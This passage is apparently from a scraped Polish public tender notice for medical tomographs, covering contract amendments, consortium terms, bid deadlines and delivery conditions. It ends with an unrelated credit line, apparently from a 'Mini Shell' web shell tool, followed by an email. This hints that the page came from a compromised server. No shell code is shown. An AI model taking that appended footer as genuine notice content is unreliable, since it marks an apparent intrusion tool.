<br/>w Postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>2.	Zamawiający, przed zawarciem umowy w sprawie zamówienia publicznego, będzie żądał umowy regulującej współpracę tych Wykonawców. Umowa, o której mowa <br/>w zdaniu poprzedzającym, nie może być zawarta na okres krótszy niż termin realizacji zamówienia. <br/>3.	Podmioty występujące wspólnie ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zobowiązań, wynikających z umowy w sprawie zamówienia publicznego.<br/>4.	W przypadku, gdy Wykonawcą będzie więcej niż jeden podmiot, wynagrodzenie należne Wykonawcy, wpłacane będzie na konto podmiotu zwanego „Liderem”, wskazanego wspólnie przez podmioty występujące, jako Wykonawca. <br/>5.	Wskazanie Lidera będzie określone w formie pisemnego upoważnienia, stanowiącego załącznik do Umowy, w którym wszystkie podmioty występujące, jako Wykonawca, upoważnią Lidera do dokonywania wszelkich rozliczeń z Zamawiającym oraz wskazania rachunku, na który zapłata ma nastąpić. Wykonawca wyraża zgodę na dokonanie przez Zamawiającego zapłaty wynagrodzenia lub jego części, zgodnie z wystawioną przez Lidera fakturą, na rachunek w niej wskazany oraz oświadcza, iż zapłata dokonana w powyższy sposób, zwalnia Zamawiającego z długu wobec Wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Oprócz zmian wskazanych w art. 455 ust. 1 pkt 2-4 i ust. 2 Ustawy, Strony, działając na podstawie art. 455 ust. 1 pkt 1) Ustawy, przewidują możliwość wprowadzenia następujących zmian do Umowy:<br/>1)	stawki podatku od towarów i usług VAT oraz podatku akcyzowego,<br/>2)	wycofania przedmiotu zamówienia z obrotu, braku dostaw przedmiotu Umowy bądź jego istotnych elementów, z powodu zaprzestania produkcji lub tymczasowego wstrzymania produkcji. W takich przypadkach Wykonawca przedstawi Zamawiającemu ofertę produktu równoważnego, o parametrach technicznych nie gorszych albo lepszych pod funkcjonalności, na co Zamawiający musi wyrazić zgodę. Zmiana ta będzie dopuszczalna pod warunkiem, iż odpowiednik, przy cenie nie wyższej niż w Umowie, będzie tożsamy z zaoferowanym. Zmiana może dotyczyć ponadto producenta, nazwy produktu, numeru katalogowego, itp.<br/>2.	Każda zmiana postanowień niniejszej Umowy wymaga formy pisemnej pod rygorem nieważności.<br/>3.	Ponadto Zamawiający dopuszcza możliwość zmiany postanowień niniejszej Umowy:<br/>1)	w zakresie wynagrodzenia, jeżeli zmiany te są korzystne dla Zamawiającego, <br/>a w szczególności, gdy Wykonawca zaproponuje upusty;<br/>2)	w przypadku zmiany danych podmiotowych Wykonawcy (np. w wynik przekształcenia, przejęcia itp.);<br/>3)	w zakresie zmiany terminu realizacji przedmiotu zamówienia, sposobu i zakresu wykonania przedmiotu Umowy:<br/>a)	z przyczyn niemożliwych wcześniej do przewidzenia, a w szczególności w przypadku przedłużających się procedur uzyskania zezwoleń lub innych dokumentów niezbędnych do prawidłowej realizacji przedmiotu Umowy, przedłużenia okresu obowiązywania Umowy, o którym mowa w §2 Umowy, tak aby zmiana terminu obowiązywania Umowy nie prowadziła do podwyższenia wartości przedmiotu niniejszej Umowy,<br/>b)	będących następstwem okoliczności, za które odpowiedzialność ponosi Zamawiający, <br/>w szczególności będących następstwem konieczności zmian dokumentacji w zakresie, w jakim okoliczności te miały lub będą mogły mieć wpływ na dotrzymanie terminu za-kończenia robót,<br/>c)	gdy wystąpi konieczność wykonania innych prac niezbędnych do wykonania przedmiotu Umowy ze względu na zasady wiedzy technicznej, oraz udzielenia zamówień dodatkowych, które wstrzymują lub opóźniają realizację przedmiotu Umowy;<br/>4)	w zakresie zmian w przyjętych rozwiązaniach w trakcie realizacji przedmiotu zamówienia <br/>w tym zmiana materiałów, pod warunkiem, że osiągnięte efekty będą równe bądź lepsze <br/>od zakładanych przez Zamawiającego, zastosowane technologie będą korzystne dla realizowanego przedmiotu Umowy a wprowadzone zmiany nie wpłyną na cenę, jakość <br/>i termin realizacji umowy;<br/>5)	w zakresie zmiany obowiązujących przepisów, jeżeli konieczne będzie dostosowanie treści Umowy do aktualnego stanu prawnego;<br/>6)	w przypadku samodzielnej realizacji zamówienia przez Wykonawcę, Zamawiający przewiduje możliwość przystąpienia Podwykonawców do zobowiązania; Wykonawca zobowiązany będzie do podania zakresu udziału Podwykonawców i powodów włączenia ich do realizacji Umowy;<br/>7)	w zakresie zmiany typu/modelu/numeru katalogowego przedmiotu zamówienia, jeżeli nie spowoduje to zmiany przedmiotu Umowy;<br/>8)	w przypadku wycofania z produkcji przedmiotu zamówienia po terminie złożenia oferty Za-mawiającemu poprzez zastąpienie go innym urządzeniem techniczne i technologiczne <br/>równorzędnym lub lepszym od pierwotnie określonych w ofercie Wykonawcy;<br/>9)	wydłużenia terminu gwarancji bez konieczności zmiany wartości przedmiotu umowy;<br/>10)	zmian postanowień umowy stanowiących następstwo zaistnienia okoliczności o charakte-rze siły wyższej;<br/>4.	Wykonawca zobowiązany jest do dostarczenia wraz z wnioskiem o zmianę Umowy wszelkich innych dokumentów wymaganych Umową, w tym informacji uzasadniających żądanie zmiany Umowy, stosowanie do zdarzenia lub okoliczności stanowiących podstawę żądania zmiany. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-09-25 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/transakcja/974558</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-09-25 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h3 class="mb-0">8.6.) Maksymalna liczba wykonawców, którzy zostaną zaproszeni do negocjacji: <span class="normal">5</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Termin realizacji zamówienia: Wykonawca zobowiązany jest dostarczyć Sprzęt, własnym transportem, na swój koszt i ryzyko, zainstalować go, uruchomić, przeprowadzić testy bezpieczeństwa oraz przeszkolić personel medyczny Zamawiającego w terminie <br/>30 (trzydziestu) dni roboczych od dnia podpisania Umowy.<br/>2. Brak możliwości podziału na części – przedmiot umowy jest niepodzielny, brak uzasadnienia, by takie same tomografy zostały zakupione od dwóch różnych dostawców.<br/>3. Zamawiający nie przewiduje odbycia przez Wykonawcę wizji lokalnej. Złożenie oferty nie wymaga odbycia przez Wykonawcę wizji lokalnej, o której mowa w art. 131 ust. 2 Ustawy.<br/>4. Podwykonawstwo:<br/>1) Wykonawca może powierzyć wykonanie części zamówienia podwykonawcy (podwykonawcom). <br/>2) Zamawiający nie zastrzega obowiązku osobistego wykonania przez Wykonawcę kluczowych części zamówienia.<br/>3) Zamawiający wymaga, aby w przypadku powierzenia części zamówienia podwykonawcom, Wykonawca wskazał w ofercie części zamówienia, których wykonanie zamierza powierzyć podwykonawcom oraz podał (o ile są mu wiadome na tym etapie) w Formularzu Ofertowym, stanowiącym Załącznik nr 1 do SWZ, nazwy (firmy) tych podwykonawców.

Creat By MiNi SheLL
Email: jattceo@gmail.com